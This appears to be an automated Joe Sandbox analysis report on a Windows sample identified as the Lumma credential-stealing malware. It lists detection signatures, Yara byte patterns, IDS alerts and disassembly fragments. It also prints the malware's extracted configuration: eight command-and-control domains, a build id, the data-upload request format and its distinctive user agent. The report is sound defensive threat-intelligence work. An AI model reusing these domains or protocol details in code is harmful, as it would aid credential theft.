Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iOnDpwrkWY.exe

Overview

General Information

Sample name:iOnDpwrkWY.exe
renamed because original name is a hash value
Original sample name:019df8734cd00261a66f10e3a4f697da.exe
Analysis ID:1577604
MD5:019df8734cd00261a66f10e3a4f697da
SHA1:6f2f9ef3f1deb53a6fb4ccef99996b621553f6a3
SHA256:2dabada3f7cc07a575e2344dc8a2f835517695fcfe55462b9a464a975d5a8af8
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • iOnDpwrkWY.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\iOnDpwrkWY.exe" MD5: 019DF8734CD00261A66F10E3A4F697DA)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "necklacebudi.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T15:53:26.831721+010020283713Unknown Traffic192.168.2.849704172.67.197.170443TCP
      2024-12-18T15:53:32.953805+010020283713Unknown Traffic192.168.2.849705172.67.197.170443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T15:53:32.458508+010020546531A Network Trojan was detected192.168.2.849704172.67.197.170443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T15:53:32.458508+010020498361A Network Trojan was detected192.168.2.849704172.67.197.170443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T15:53:26.831721+010020583611Domain Observed Used for C2 Detected192.168.2.849704172.67.197.170443TCP
      2024-12-18T15:53:32.953805+010020583611Domain Observed Used for C2 Detected192.168.2.849705172.67.197.170443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T15:53:25.027569+010020583601Domain Observed Used for C2 Detected192.168.2.8600531.1.1.153UDP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: iOnDpwrkWY.exeAvira: detected
      Source: https://discokeyus.lat/api%%Avira URL Cloud: Label: malware
      Source: https://discokeyus.lat/Avira URL Cloud: Label: malware
      Source: https://discokeyus.lat/apiAvira URL Cloud: Label: malware
      Source: 0.3.iOnDpwrkWY.exe.a60000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "necklacebudi.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}
      Source: iOnDpwrkWY.exeReversingLabs: Detection: 68%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: iOnDpwrkWY.exeJoe Sandbox ML: detected
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000003.1706658378.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

      Compliance

      barindex
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeUnpacked PE file: 0.2.iOnDpwrkWY.exe.400000.0.unpack
      Source: iOnDpwrkWY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0043C767
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp eax0_2_0042984F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00423860
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov edx, ecx0_2_00438810
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00438810
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00438810
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then test eax, eax0_2_00438810
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041682D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_0041682D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_0041682D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D83A
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B170
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_004179C1
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0043B1D0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_0043B1D0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_00405990
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebp, eax0_2_00405990
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, esi0_2_00422190
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00422190
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00422190
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CA49
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042DA53
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00416263
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00415220
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push esi0_2_00427AD3
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CAD0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041B2E0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push ebx0_2_0043CA93
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00428B61
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB11
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB22
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0043F330
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0041D380
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp al, 2Eh0_2_00426B95
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435450
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push 00000000h0_2_00429C2B
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_004074F0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_004074F0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043ECA0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_004385E0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp eax0_2_004385E0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00417DEE
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_00409580
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_00409580
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp dword ptr [0044450Ch]0_2_00418591
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00428D93
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then xor edi, edi0_2_0041759F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0041C653
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov edx, ebp0_2_00425E70
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00425E30
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_0043AEC0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_00408F50
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408F50
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042A700
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0040B70C
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BF14
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00419F30
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0041E7C0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_004197C2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [edi], dx0_2_004197C2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [esi], cx0_2_004197C2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, ebx0_2_0042DFE9
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp ecx0_2_0040BFFD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov esi, eax0_2_00415799
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_00415799
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043EFB0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov edx, ebp0_2_00A160D7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00A14031
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00A08055
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_009F91B7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_009F91B7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00A0A197
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_00A2B127
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00A0C17B
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push C0BFD6CCh0_2_00A132ED
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00A0D230
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00A0D230
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_00A2F217
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, ebx0_2_00A1E250
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp ecx0_2_009FC264
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, esi0_2_00A123F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00A123F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00A123F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_00A1B3D7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00A05487
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00A064CA
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00A164DA
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00A19444
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_00A19444
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_00A2F597
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00A075E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_00A0D5E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_00A0B547
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00A256B7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_009F97E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_009F97E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_009F7757
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_009F7757
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_00A0C8BA
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_00A2887B
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp eax0_2_00A2898E
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_00A2C9CE
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00A1A967
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_009FB973
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then jmp eax0_2_00A19AB5
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_00A0DAB8
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]0_2_00A04ACD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_00A0EA27
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_00A09A29
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [edi], dx0_2_00A09A29
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00A09A29
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov edx, ecx0_2_00A28A77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00A28A77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00A28A77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then test eax, eax0_2_00A28A77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_009F5BF7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebp, eax0_2_009F5BF7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]0_2_00A04BD2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00A06B2A
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_00A1CCB0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [esi], al0_2_00A1DCBC
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push ebx0_2_00A2CCFA
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_00A07C28
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then xor edi, edi0_2_00A07C28
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov esi, eax0_2_00A05C41
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_00A1CD89
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00A18DC8
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_00A1CD37
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push esi0_2_00A17D1A
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_00A1CD78
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh0_2_00A04E87
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh0_2_00A04E96
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then cmp al, 2Eh0_2_00A16E96
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_009FDE40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ebx, eax0_2_009FDE40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00A18FA0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then mov ecx, eax0_2_00A05FD3
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_00A06F35
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_00A06F35
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_00A2EF07
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 4x nop then push 00000000h0_2_00A19F40

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.8:49704 -> 172.67.197.170:443
      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:60053 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.8:49705 -> 172.67.197.170:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 172.67.197.170:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 172.67.197.170:443
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 172.67.197.170:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.197.170:443
